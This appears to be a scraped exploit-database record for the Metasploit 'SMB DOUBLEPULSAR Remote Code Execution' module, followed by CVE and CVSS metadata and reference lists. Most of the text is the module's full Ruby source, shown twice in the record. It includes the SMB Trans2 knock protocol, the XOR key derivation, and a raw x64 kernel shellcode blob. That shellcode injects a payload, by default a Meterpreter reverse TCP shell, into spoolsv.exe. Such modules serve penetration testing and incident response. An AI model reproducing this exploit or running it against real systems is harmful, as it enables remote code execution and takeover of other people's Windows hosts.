'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-21] #"}, "lastseen": "2021-09-20T21:24:01", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "78b9fe9ec81a45632b2d56b3697d91a1", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-22T06:19:54", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-22T06:19:54", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-22T06:19:54", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n 